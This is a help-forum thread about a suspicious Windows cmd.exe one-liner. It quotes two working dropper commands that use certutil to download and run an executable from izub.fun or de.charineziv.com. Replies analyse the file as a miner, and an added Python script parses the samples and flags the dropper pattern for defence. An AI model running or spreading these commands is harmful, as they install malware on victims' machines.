Looks like a virus??

June 28, 2020 at 11:16:26
Specs: Windows 10
I found this bit of code that targets cmd.exe.
I have a feeling it allows someone access to your PC, but I'm not sure:
%ComSpec% /v:on/c(SET bMbca=certutil -urlcache -f https://&SET kIJK=/?LnoKIKMOM6899bbfhJfgPiTV99fiKr7t=lessees_%PROCESSOR_ARCHITECTURE% !E0!&SET E0="%USERNAME%.exe"&IF NOT EXIST !E0! (!bMbca!izub.fun!kIJK!||!bMbca!de.charineziv.com!kIJK!&!E0!))>nul 2>&1



#1
June 28, 2020 at 16:09:42
Here are the first 2 steps; more steps may be needed after I see the results of these logs.

Step 1: Run AdwCleaner
https://www.softpedia.com/get/Antiv...
https://www.bleepingcomputer.com/do...
https://www.malwarebytes.com/adwcle...
https://toolslib.net/downloads/view...
Close all open programs and internet browsers.
Double click on AdwCleaner.exe to run the tool.
Click Scan Now
Click on Quarantine for all it finds.
Reboot.
Please Copy & Paste the contents of that logfile with your next reply.
https://i.imgur.com/qERgl4y.gif

Step 2: Run Malwarebytes Anti-Malware (MBAM). Use Threat Scan. Make sure Rootkit scan is on.
https://www.softpedia.com/get/Antiv...
https://www.freewarefiles.com/Malwa...
https://www.freewarefiles.com/scree...
https://www.malwarebytes.org/downlo...
Forum
https://www.malwarebytes.org/forums/
Scanning, you will get something like this.
https://i.imgur.com/4NZ5Qw0.gif
https://i.imgur.com/rRfr1oD.gif
https://i.imgur.com/tShE6tQ.gif
https://i.imgur.com/iJZHDC0.gif
After a restart (if required), copy & paste the contents of the scan into your reply.
If too large, upload to a site of your choosing.
Follow these directions, until you get to Export.
https://support.malwarebytes.com/hc...

message edited by Johnw



#2
June 28, 2020 at 22:12:14
I took this code from your post and modified some instructions inside it in order to just download the suspect file, without executing it of course, and I uploaded it to https://www.virustotal.com
It looks like a miner.

NB: I renamed it as Suspect.exe

https://www.virustotal.com/gui/file...

and I uploaded it to https://www.hybrid-analysis.com/ too

The result is here:
https://www.hybrid-analysis.com/sam...



#3
July 1, 2020 at 11:37:27
Hi, can you explain what this code does? I have found it on a user's PC and am trying to understand it. How can you tell if it's been run?



#4
July 1, 2020 at 12:16:43
@Isolation
You can give my batch a try to check whether there is something suspect running or not!
Just copy and paste this code into Notepad and save it as Processes_Services_Tasks_Startup.bat
After the scan, the batch creates a LogFile.



#5
July 6, 2020 at 00:16:16
Hi Hackoo, can you do the same for this code? Wondering if it's the same payload.

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1


Thank you!


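An added example for the question in #3 ("what does this code do, and how can you tell if it has run?"), not part of this thread and not Hackoo's batch: a Python script that statically expands the two one-liners quoted above (the first post and reply #5) into the commands cmd.exe would actually run, pulls out the indicators a defender would hunt for, and scores an arbitrary process command line against the same pattern. It never executes anything; the account name and architecture it substitutes (alice, AMD64) are placeholders, and the function names are my own.

```python
"""Static look at the cmd.exe one-liners quoted in this thread.
The samples are parsed and expanded in memory only; nothing is executed."""
import re

# Constructed input: the two one-liners quoted in the thread (first post and
# reply #5), copied as plain data.
SAMPLES = {
    "post_1": r'%ComSpec% /v:on/c(SET bMbca=certutil -urlcache -f https://&SET kIJK=/?LnoKIKMOM6899bbfhJfgPiTV99fiKr7t=lessees_%PROCESSOR_ARCHITECTURE% !E0!&SET E0="%USERNAME%.exe"&IF NOT EXIST !E0! (!bMbca!izub.fun!kIJK!||!bMbca!de.charineziv.com!kIJK!&!E0!))>nul 2>&1',
    "post_5": r'%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1',
}

# Placeholder environment standing in for the victim account (assumed values).
FAKE_ENV = {"USERNAME": "alice", "PROCESSOR_ARCHITECTURE": "AMD64"}

SET_RE = re.compile(r"^SET\s+(\w+)=(.*)$")
PERCENT_RE = re.compile(r"%(\w+)%")   # %VAR%: environment, expanded at parse time
BANG_RE = re.compile(r"!(\w+)!")      # !var!: delayed expansion (/v:on), per command
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(/\S*)?")


def split_block(one_liner):
    """Return the '&'-separated commands inside the outer cmd /c( ... ) block.
    The trailing IF command contains its own '&' and '||', so everything from
    the first 'IF ' segment onward is kept together as one command."""
    start = one_liner.index("/c(") + 3
    end = one_liner.rindex(")>nul")
    parts = one_liner[start:end].split("&")
    commands = []
    while parts:
        part = parts.pop(0)
        if part.startswith("IF "):
            commands.append("&".join([part] + parts))
            break
        commands.append(part)
    return commands


def expand(text, variables, env):
    """Resolve %VAR% from the (static) environment, then !var! from the
    script's own SET table as it stands at this moment; an unset !var! is
    empty, which is what cmd does under delayed expansion."""
    text = PERCENT_RE.sub(lambda m: env.get(m.group(1), m.group(0)), text)
    return BANG_RE.sub(lambda m: variables.get(m.group(1), ""), text)


def resolve(one_liner, env=FAKE_ENV):
    """Walk the block in execution order, recording each SET, and return the
    expanded command list plus the final variable table."""
    variables, resolved = {}, []
    for cmd in split_block(one_liner):
        cmd = expand(cmd, variables, env)
        m = SET_RE.match(cmd)
        if m:
            variables[m.group(1)] = m.group(2)
        resolved.append(cmd)
    return resolved, variables


def indicators(one_liner, env=FAKE_ENV):
    """Pull out what a defender would hunt for: the downloader, URLs, domains,
    the file the sample drops and whether it is launched afterwards."""
    resolved, _ = resolve(one_liner, env)
    work = resolved[-1]  # the IF NOT EXIST ... block that does the work
    hits = list(URL_RE.finditer(work))
    drop = re.search(r'IF NOT EXIST ("?[^ ]+"?)', work)
    drop_name = drop.group(1) if drop else None
    return {
        "downloader": "certutil -urlcache" if "certutil -urlcache" in work else None,
        "urls": [m.group(0) for m in hits],
        "domains": [m.group(1) for m in hits],
        "drop_name": drop_name,
        "runs_drop": bool(drop_name) and work.rstrip(")").endswith(drop_name),
    }


# Traits of this dropper that survive the random variable names; meant for
# process command lines from Sysmon event 1, scheduled task actions or Run keys.
DROPPER_HINTS = (
    re.compile(r"certutil(\.exe)?\s+-urlcache", re.I),  # LOLBin download
    re.compile(r"/v:on", re.I),                         # delayed expansion switched on
    re.compile(r"!\w+!"),                               # delayed-expansion references
    re.compile(r"IF NOT EXIST", re.I),                  # run-once guard on the drop
)


def dropper_score(cmdline):
    """Number of hints present; both thread samples score 4, and ordinary
    admin command lines rarely hit more than one."""
    return sum(1 for rx in DROPPER_HINTS if rx.search(cmdline))


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"== {name}: score {dropper_score(sample)}")
        for cmd in resolve(sample)[0]:
            print("   ", cmd)
        print("    indicators:", indicators(sample))
```

Running it prints, for each sample, the four commands as cmd would see them and the indicator table: certutil fetching from izub.fun with de.charineziv.com as the fallback, a drop file named after the account with .exe appended, and a final step that launches that file. The expander applies delayed expansion in command order, so the !E0! (or !H!) reference inside the URL variable resolves to empty because that variable is assigned one command later; that is how cmd /v:on treats a not-yet-set !var!. The indicators are what to check on the user's PC: the two domains in DNS or proxy logs, a file named <account>.exe in the directory the command ran from, and the certutil URL cache, which certutil -urlcache (with no other arguments) lists.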

#6
July 6, 2020 at 15:22:06
@coyotez2020
Risk Assessment
Remote Access
Reads terminal service related keys (often RDP related)
Fingerprint
Queries kernel debugger information
Reads the active computer name
Reads the cryptographic machine GUID
Evasive
The input sample contains a known anti-VM trick
Tries to sleep for a long time (more than two minutes)
Network Behavior
Contacts 2 domains and 1 host.

Overview
https://www.hybrid-analysis.com/sam...

Details:
https://www.hybrid-analysis.com/sam...




#7
July 6, 2020 at 16:00:52
Thank you so much Hackoo! I feel better it doesn't appear to be ransomware, more bitcoin mining I guess. Can I safely download that .exe so I can submit it to an AV vendor for proper identification/removal? I didn't see an option on the Hybrid site to just re-DL it (phew). I don't see any suspicious netstat traffic and it would be hard coded for those destination IPs/Ports huh? I also ran your Processes_Services_Tasks_Startup.bat tool and didn't see anything glaring as suspicious. I'm just not sure next best step, I kind of feel it failed to install. Thx again

message edited by coyotez2020


